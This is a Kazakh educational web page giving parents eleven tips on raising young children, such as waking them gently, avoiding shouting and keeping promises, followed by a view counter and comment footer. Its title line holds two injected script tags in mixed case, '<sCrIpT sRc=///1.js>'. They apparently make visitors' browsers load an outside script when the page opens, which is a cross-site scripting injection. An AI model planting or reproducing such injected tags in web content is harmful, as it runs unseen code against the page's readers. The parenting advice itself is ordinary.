Ата-ана сіздер үшін!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.07.2020

  1. Бала тәрбиелеу-бесіктен басталады. Ендеше оған әрдайым көңіл бөліп, сергек қараңыз. Қателігін зекіп, ұрысып немесе ұру арқылы түзетуге тырыспаңыз.
  2. Таңертең балабақшаға барарында баланы жайлап қана оятыңыз. Сіздің биязы үніңіз бен күлкіңіз бен күлкіңіз-ақ ұйқысын ашуы тиіс.
  3. Егер балаңыз балабақшаға кешігетіңдей болып жатса, онда «Бол да бол» деп айғайламаңыз. Оны ертерек оятпаған өзіңіз кінәлісіз.
  4. «Бұзық болма», «Қисаландаамай тыныш жүр»- деген ескертулерді жиі айта бермеңіз. Керісінше , оған жылу сыйлап, тілектестік болыңыз.
  5. Бала бірдеңеге ашуланып жүрсе, үндемеңіз. Сабасына түскен соң, ол болған жайды өзі-ақ айтады.
  6. Күнде жарты сағат ештеңеге алаңдамай балаларыңызбен емін-еркін , жақын тартып, әңгімелесіп тұрыңыз.
  7. Өз балаңызды дос санаңыз: білімін толықтыруға көмектесіп, жақсы ісін бағалай біліңіз. Шамамен тыс қатал, керісінше тым көңілшек болмаңыз. Нақты шешім ғана баланы қателесуден сақтандырады.
  8. Отбасыңыздағы ұрыс-керіс балаңыздың жүйкесін жұқартады. Баламен бірге отырған жерде құпиялы әңгімен айтпаңыз.
  9. Балаңызға уәде берсеніз орындаңыз. Кемшілікті байқамауға тырысыңыз. Баланың көзінше өзгені сынамаңыз.
  10.  Тәрбие ісінде өзіңіздің жауапты екеніңізді ұмытпаңыз, баланың өтінішін үнемі орындай бермеңіз.
  11.  Баланы өзгелерге де көмектесіп тұруға баулыңыз. Оған шыдамды болуды.

 

Просмотров: 523


Пікір қосу



Деректерді қолтаңбаға қосу
Текст